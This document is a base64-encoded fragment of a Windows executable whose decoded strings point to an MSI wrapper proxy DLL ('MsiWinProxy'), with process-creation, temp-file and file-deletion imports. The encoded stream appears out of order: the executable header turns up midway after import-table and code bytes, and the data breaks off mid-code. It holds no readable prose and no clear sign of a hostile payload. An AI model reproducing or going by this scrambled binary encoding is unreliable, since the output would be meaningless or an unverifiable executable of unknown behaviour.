MD3l/qlMjRSIsXYtZtvtxpAQAAAEM6XHNzMlxQcm9qZWN0c1xNc2lXcmFwcGVyXE1zaVdpblByb3h5XFJlbGVhc2VcTXNpV2luUHJveHkucGRiAAAAAAAAAAAAAAA0AAAcNgAAMJMAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAkBtAAAAAAAD+////AAAAANT///8AAAAA/v///wAAAADyHEAAAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAPofQAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAA+yFAAAAAAAD+////AAAAANT///8AAAAA/v///wAAAADtIkAAAAAAAP7///8AAAAAiP///wAAAAD+////tSRAALkkQAD+////eyRAAI8kQAD+////AAAAAND///8AAAAA/v///wAAAACNM0AAAAAAAP7///8AAAAA0P///wAAAAD+////AAAAACY4QAAAAAAA/v///wAAAADM////AAAAAP7///8AAAAA4zlAAAAAAAAAAAAArzlAAP7///8AAAAA0P///wAAAAD+////AAAAAHJDQAAAAAAA/v///wAAAADQ////AAAAAP7///8AAAAAf0xAAAAAAAD+////AAAAANT///8AAAAA/v///wAAAABLUEAAAAAAAP7///8AAAAA0P///wAAAAD+////AAAAAOJRQAAAAAAA/v///wAAAADI////AAAAAP7///8AAAAA9VRAAAAAAAD+////AAAAAIz///8AAAAA/v///6deQACrXkAAAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAEBhQAD+////AAAAAE9hQAD+////AAAAANj///8AAAAA/v///wAAAAACY0AA/v///wAAAAAOY0AA/v///wAAAADM////AAAAAP7///8AAAAACWdAAAAAAAD+////AAAAANT///8AAAAA/v///wAAAAB+akAAAAAAAP7///8AAAAAzP///wAAAAD+////AAAAAExuQAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAvHFAAAAAAAD+////AAAAAND///8AAAAA/v///wAAAAD6hUAAAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAHaHQAAAAAAA/v///wAAAADM////AAAAAP7///8AAAAAa49AAAAAAAD+////AAAAAND///8AAAAA/v///36RQACVkUAAAAAAAP7///8AAAAA2P///wAAAAD+////25JAAO+SQAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAV5ZAAAAAAAD+////AAAAAMj///8AAAAA/v///wAAAAAdmEAAAAAAAAAAAABZl0AA/v///wAAAADQ////AAAAAP7///8AAAAA/ZhAAAAAAAD+////AAAAANT///8AAAAA/v///wqaQAAmmkAAAAAAAP7///8AAAAA2P///wAAAAD+/////KdAAACoQAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAR6lAAAAAAAD+////AAAAAMD///8AAAAA/v///wAAAAA0q0AAAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAHy8QAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAARr5AAAAAAAD+////AAAAAND///8AAAAA/v///wAAAACrv0AAAAAAAP7///8AAAAA0P///wAAAAD+////AAAAAI7JQAC4/gAAAAAAAAAAAADcAAEAAOAAAAgAAQAAAAAAAAAAAPgAAQBQ4QAA+P8AAAAAAAAAAAAAGgEBAEDhAAAAAAEAAAAAAAAAAAA4AQEASOEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAABACYAAQA4AAEASAABAFwAAQBsAAEAfgABAI4AAQCkAAEAugABAMgAAQDQAAEA+gUBAOwFAQBEAQEAUgEBAGQBAQB4AQEAjAEBAKgBAQDGAQEA2gEBAPIBAQAKAgEAFgIBACgCAQA+AgEASgIBAFYCAQBsAgEAfAIBAI4CAQCaAgEArgIBAMACAQDOAgEA3gIBAPQCAQAKAwEAJAMBAD4DAQBQAwEAXgMBAHADAQCIAwEAlgMBAKIDAQCwAwEAugMBANIDAQDoAwEAAAQBAA4EAQAcBAEANgQBAEYEAQBcBAEAdgQBAIIEAQCMBAEAmAQBAKoEAQC4BAEA4AQBAPAEAQAEBQEAFAUBACoFAQA6BQEARgUBAFYFAQBkBQEAdAUBAIQFAQCUBQEApgUBALgFAQDKBQEA2gUBAAAAAAAEAQEAAAAAACYBAQAAAAAA6gABAAAAAADqAUdldEZpbGVBdHRyaWJ1dGVzVwAAhwFHZXRDb21tYW5kTGluZVcAhQJHZXRUZW1wUGF0aFcAAIMCR2V0VGVtcEZpbGVOYW1lVwAAcwRTZXRMYXN0RXJyb3IAAKgAQ3JlYXRlUHJvY2Vzc1cAAAICR2V0TGFzdEVycm9yAAD5BFdhaXRGb3JTaW5nbGVPYmplY3QA3wFHZXRFeGl0Q29kZVByb2Nlc3MAAFIAQ2xvc2VIYW5kbGUAsgRTbGVlcABIA0xvY2FsRnJlZQBLRVJORUwzMi5kbGwAABUCTWVzc2FnZUJveFcAVVNFUjMyLmRsbAAABgBDb21tYW5kTGluZVRvQXJndlcAAFNIRUxMMzIuZGxsAEUAUGF0aEZpbGVFeGlzdHNXAFNITFdBUEkuZGxsANYARGVsZXRlRmlsZVcAYwJHZXRTdGFydHVwSW5mb1cAwARUZXJtaW5hdGVQcm9jZXNzAADAAUdldEN1cnJlbnRQcm9jZXNzANMEVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAAClBFNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAA0lzRGVidWdnZXJQcmVzZW50AO4ARW50ZXJDcml0aWNhbFNlY3Rpb24AADkDTGVhdmVDcml0aWNhbFNlY3Rpb24AABgEUnRsVW53aW5kAGYEU2V0RmlsZVBvaW50ZXIAAGcDTXVsdGlCeXRlVG9XaWRlQ2hhcgDAA1JlYWRGaWxlAAAlBVdyaXRlRmlsZQARBVdpZGVDaGFyVG9NdWx0aUJ5dGUAmgFHZXRDb25zb2xlQ1AAAKwBR2V0Q29uc29sZU1vZGUAAM8CSGVhcEZyZWUAABgCR2V0TW9kdWxlSGFuZGxlVwAARQJHZXRQcm9jQWRkcmVzcwAAGQFFeGl0UHJvY2VzcwBkAkdldFN0ZEhhbmRsZQAAEwJHZXRNb2R1bGVGaWxlTmFtZUEAABQCR2V0TW9kdWxlRmlsZU5hbWVXAABhAUZyZWVFbnZpcm9ubWVudFN0cmluZ3NXANoBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAbwRTZXRIYW5kbGVDb3VudAAA8wFHZXRGaWxlVHlwZQBiAkdldFN0YXJ0dXBJbmZvQQDRAERlbGV0ZUNyaXRpY2FsU2VjdGlvbgDHBFRsc0dldFZhbHVlAMUEVGxzQWxsb2MAAMgEVGxzU2V0VmFsdWUAxgRUbHNGcmVlAO8CSW50ZXJsb2NrZWRJbmNyZW1lbnQAAMUBR2V0Q3VycmVudFRocmVhZElkAADrAkludGVybG9ja2VkRGVjcmVtZW50AADNAkhlYXBDcmVhdGUAAOwEVmlydHVhbEZyZWUApwNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgCTAkdldFRpY2tDb3VudAAAwQFHZXRDdXJyZW50UHJvY2Vzc0lkAHkCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAcgFHZXRDUEluZm8AaAFHZXRBQ1AAADcCR2V0T0VNQ1AAAAoDSXNWYWxpZENvZGVQYWdlAI8AQ3JlYXRlRmlsZVcA4wJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uQW5kU3BpbkNvdW50AIcEU2V0U3RkSGFuZGxlAABXAUZsdXNoRmlsZUJ1ZmZlcnMAABoFV3JpdGVDb25zb2xlQQCwAUdldENvbnNvbGVPdXRwdXRDUAAAJAVXcml0ZUNvbnNvbGVXAMsCSGVhcEFsbG9jAOkEVmlydHVhbEFsbG9jAADSAkhlYXBSZUFsbG9jADwDTG9hZExpYnJhcnlBAAArA0xDTWFwU3RyaW5nQQAALQNMQ01hcFN0cmluZ1cAAGYCR2V0U3RyaW5nVHlwZUEAAGkCR2V0U3RyaW5nVHlwZVcAAAQCR2V0TG9jYWxlSW5mb0EAAFMEU2V0RW5kT2ZGaWxlAABKAkdldFByb2Nlc3NIZWFwAACIAENyZWF0ZUZpbGVBANQCSGVhcFNpemUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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